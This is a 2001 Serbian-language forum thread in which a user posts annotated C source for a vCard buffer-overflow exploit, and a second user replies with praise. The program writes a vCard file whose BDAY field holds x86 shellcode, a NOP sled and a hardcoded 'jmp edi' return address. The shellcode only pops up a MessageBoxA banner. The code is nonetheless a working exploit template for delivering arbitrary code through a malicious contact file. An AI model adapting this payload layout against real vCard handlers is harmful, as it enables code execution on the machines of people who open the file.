[ kajla @ 29.07.2001. 23:54 ] @
Posto je bilo pitanja u vezi sa ovim exploit-om, odlucio sam da ga postujem (nadam se da su komentari pregledni). Napomena: adrese u kodu (MessageBoxA u user32.dll i povratna adresa za `jmp edi`) su hardkodovane za jednu konkretnu verziju Windows-a/user32.dll, pa na drugoj verziji exploit nece raditi bez ponovnog trazenja tih adresa; forum je takodje "pojeo" sve backslash-eve u string literalima (`\x..`, `\n`), sto treba imati u vidu pri kompajliranju:

Code:

#include <stdio.h>

#if defined(__TURBOC__) || defined(__BORLANDC__)
#include <conio.h>      /* clrscr(), getch(): Borland/Turbo C only, not ISO C */
#endif

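/*
 * Write exactly n bytes of p to f.
 * Returns 0 on success, -1 on a short write.
 *
 * Used instead of fprintf("%s", ...) so that a NUL byte inside a payload
 * piece would be written rather than silently truncating the file. The
 * shellcode below happens to be NUL-free, so the output is identical
 * either way; the check just makes that requirement explicit.
 */
static int write_bytes(FILE *f, const char *p, size_t n)
{
    return fwrite(p, 1, n, f) == n ? 0 : -1;
}

/*
 * Generates vCard.vcf: a vCard 2.1 file whose BDAY field carries a
 * 76-byte payload (58 bytes of shellcode, 14 NOPs, 4-byte return address)
 * instead of a date. Whichever vCard handler overflows on that field is
 * not named in the post; the post only says it is a "vCard exploit".
 *
 * Portability / reproducibility notes:
 *  - The two addresses (MessageBoxA in user32.dll, and the overwritten
 *    return address) are hardcoded for one specific Windows build. On any
 *    other build the payload will not work until they are re-located.
 *  - The posted listing had every backslash stripped by the forum
 *    ("x90" instead of "\x90", "VCARDn" instead of "VCARD\n"); the
 *    literals below are restored to proper escapes.
 *  - The file is opened in text mode ("w"): on DOS/Windows C runtimes each
 *    "\n" becomes "\r\n", which is the vCard line terminator. Do not switch
 *    to "wb" without re-checking the target's parser.
 *
 * Returns 0 on success, 1 if the file cannot be created or written.
 */
int main(void)
{
    FILE *f;
    int ok;

    /* Overwritten return address, little-endian 0x767995C5. Per the author
     * this is a `jmp edi` gadget, so edi must point at the start of the
     * payload when the overflowed function returns -- that assumption is
     * not shown here; verify it against the target before reuse. */
    char eip[] = "\xc5\x95\x79\x76";

    /* 58-byte shellcode, NUL-free. Calls
     *   MessageBoxA(0, "vCard exploit by kajla", "vCard exploit by kajla", 0)
     * The message text is built in place at [edx]; edx is assumed to point
     * at writable scratch memory at the time of the overflow (not shown
     * here -- verify). After MessageBoxA returns (ret 0x10), execution
     * presumably falls through into the NOPs and then into the return
     * address bytes; nothing restores the process, so expect a crash. */
    char shell_code[] =
        "\x33\xF6"                      /* xor  esi, esi                  */
        "\x68\x2E\x41\xF5\xBF"          /* push 0xBFF5412E  ; MessageBoxA  */
                                        /*   in user32.dll, this build only*/
        "\x56"                          /* push esi         ; uType = 0    */
        "\xC7\x02\x76\x43\x61\x72"      /* mov dword [edx],      'vCar'    */
        "\xC7\x42\x04\x64\x20\x65\x78"  /* mov dword [edx+0x04], 'd ex'    */
        "\xC7\x42\x08\x70\x6C\x6F\x69"  /* mov dword [edx+0x08], 'ploi'    */
        "\xC7\x42\x0C\x74\x20\x62\x79"  /* mov dword [edx+0x0C], 't by'    */
        "\xC7\x42\x10\x20\x6B\x61\x6A"  /* mov dword [edx+0x10], ' kaj'    */
        "\x89\x72\x14"                  /* mov dword [edx+0x14], esi ; NUL */
        "\x66\xC7\x42\x14\x6C\x61"      /* mov word  [edx+0x14], 'la'      */
        "\x52"                          /* push edx         ; lpCaption    */
        "\x52"                          /* push edx         ; lpText       */
        "\x56"                          /* push esi         ; hWnd = 0     */
        "\xFF\x54\x24\x10";             /* call [esp+0x10]  ; stack now:   */
                                        /*   +0 hWnd, +4 lpText, +8 lpCap, */
                                        /*   +C uType, +10 MessageBoxA addr*/

    /* 14 NOPs of padding between the shellcode and the return address. */
    char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

    /* vCard prefix; ends with "BDAY:" so the payload becomes the BDAY value. */
    char body_text[] =
        "BEGIN:VCARD\n"
        "VERSION:2.1\n"
        "N:;kajla\n"
        "FN:kajla\n"
        "BDAY:";

    /* vCard suffix. The EMAIL address was redacted by the forum; a line
     * terminator is added after it so REV: stays on its own line. */
    char end_text[] =
        "EMAIL;PREF;INTERNET:[email protected]\n"
        "REV:20010728T152652Z\n"
        "END:VCARD\n";

#if defined(__TURBOC__) || defined(__BORLANDC__)
    clrscr();                           /* cosmetic, Borland conio only */
#endif

    if ((f = fopen("vCard.vcf", "w")) == NULL)
    {
        fprintf(stderr, "Cannot create file vCard.vcf\n");
        return 1;
    }

    /* Layout: <prefix><shellcode><nops><eip>\n<suffix> */
    ok = write_bytes(f, body_text,  sizeof body_text  - 1) == 0
      && write_bytes(f, shell_code, sizeof shell_code - 1) == 0
      && write_bytes(f, nops,       sizeof nops       - 1) == 0
      && write_bytes(f, eip,        sizeof eip        - 1) == 0
      && write_bytes(f, "\n", 1) == 0
      && write_bytes(f, end_text,   sizeof end_text   - 1) == 0;

    /* fclose() flushes the buffered data; a failure here is a failed write. */
    if (fclose(f) != 0)
        ok = 0;

    if (!ok)
    {
        fprintf(stderr, "Cannot write file vCard.vcf\n");
        return 1;
    }

    printf("File: vCard.vcf created!");

#if defined(__TURBOC__) || defined(__BORLANDC__)
    getch();                            /* wait for a key, Borland conio only */
#endif

    return 0;
}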
[ slash @ 30.07.2001. 11:07 ] @
nemam bas nesto iskustva sa win32 overflowima pa mi je jako zao sto se nisam mogao ukljuciti u diskusiju, iako je predator to nadoknadio :) Nice exploit btw :)

keep up the good work !